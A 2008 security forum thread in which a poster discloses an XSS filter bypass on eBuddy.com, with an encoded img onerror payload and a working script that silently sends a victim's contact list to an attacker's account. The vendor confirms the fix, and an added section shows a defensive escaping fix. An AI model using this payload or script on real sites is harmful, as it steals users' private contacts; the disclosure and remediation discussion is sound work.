Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
eBuddy.com Xss
Posted by: Jiu
Date: March 31, 2008 12:06PM

Hi

I found a vulnerability in ebuddy.com. You can send javascript in img or iframe, but you must encode the code.

<img src=. onerror="alert('xss');"> won't work, but if you send %3cimg src=. onerror=%27alert(%22xss%22);%27%3e, the javascript will execute.

http://img442.imageshack.us/my.php?image=proof3go4.jpg

So I just wrote that to steal the contact list

// Get a request object (ActiveX fallback for old IE)
if(window.XMLHttpRequest)
    x = new XMLHttpRequest();
else if(window.ActiveXObject)
    x = new ActiveXObject("Microsoft.XMLHTTP");
m=document.getElementById("contacts_tree");
cd=new Array();

// Read each contact id out of the contact tree markup
peds=m.innerHTML.split("nogroup_");
for(i=1;i<peds.length;i++){
    cd.push(peds[i].split("_msn-")[0]);
}

cont="";
// Session hash from the page's query string
h=_udl.search.split("=")[1].substring(0,32);
for(i=0;i<cd.length;i++){
    cont+=cd[i]+"\n";
    // Send in chunks, and flush on the last contact
    if(cont.length > 1150 || i==cd.length-1){
        data="e_hash="+h+"&e_action=send_message&e_user=****@hotmail.com&e_message="+cont+"&e_format=FN=Verdana; EF=; CO=000000; CS=0; PF=00; RL=0&e_network=MSN&_=";
        x.open("POST",Core.EMSN_URL,false);
        x.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
        x.setRequestHeader("Content-Length",data.length);
        x.send(data);
        cont="";
    }
}

The eBuddy user doesn't see that he sends you a message with all his contacts ^^

http://img505.imageshack.us/my.php?image=proof1pu7.jpg

I alerted the eBuddy team about that, and they will correct this hole

Cya
Jiu
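
Added example (not part of the original post, and not eBuddy's code): the post shows the raw tag being rejected while its percent-encoded form executes. Assuming the cause was a filter that inspected the value before URL-decoding it, the code below puts that ordering beside a version that decodes once and then HTML-escapes at output. The names renderWeak, renderSafe and escapeHtml are hypothetical; the two inputs are the ones quoted in the post.

```javascript
// Assumption: the bypass came from filtering the raw value before URL-decoding.
// Hypothetical function names; this is not eBuddy's server code.

// Weak ordering: inspect the still-encoded value, then decode and emit it.
function renderWeak(rawParam) {
  if (/[<>]/.test(rawParam)) return null;   // "%3c" contains no "<", so it passes
  return '<div class="msg">' + decodeURIComponent(rawParam) + "</div>";
}

// Escape the characters that are significant in HTML text and attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened ordering: decode exactly once, then encode for the output context.
function renderSafe(rawParam) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawParam);
  } catch (e) {
    return null;                            // malformed percent-escape: reject
  }
  return '<div class="msg">' + escapeHtml(decoded) + "</div>";
}

// The two inputs quoted in the post.
const plain = "<img src=. onerror=\"alert('xss');\">";
const encoded = "%3cimg src=. onerror=%27alert(%22xss%22);%27%3e";

function demo() {
  return {
    weakPlain: renderWeak(plain),       // null: the blocklist catches the raw tag
    weakEncoded: renderWeak(encoded),   // live <img ... onerror=...> markup
    safeEncoded: renderSafe(encoded),   // inert text, tag characters escaped
  };
}
```

Escaping at output does not depend on guessing which encodings an input filter should look for, which is why the hardened version drops the blocklist entirely.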

Re: eBuddy.com Xss
Posted by: nverdo
Date: April 03, 2008 11:05AM

Jiu Wrote:
>
> I alerted the eBuddy team about that, and they
> will correct this hole
>

The fix has been released to our servers. Thanks Jiu for making us aware of this vulnerability.

Niels
Director Development eBuddy

Re: eBuddy.com Xss
Posted by: LUPUS
Date: January 06, 2009 04:06AM

Ebuddy.com , xss vuln. fixed.. :(

--

Re: eBuddy.com Xss
Date: January 07, 2009 05:19PM

=o) awesome! Kudos to ebuddy for fixing it so fast.

Re: eBuddy.com Xss
Posted by: Malkav
Date: January 08, 2009 05:14AM

kudos to ebuddy for quick reaction, and acknowledging here the disclosure. we want to see more of that

----------------------------------------------------------------------------------------------------------------

Those that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.
--Benjamin Franklin
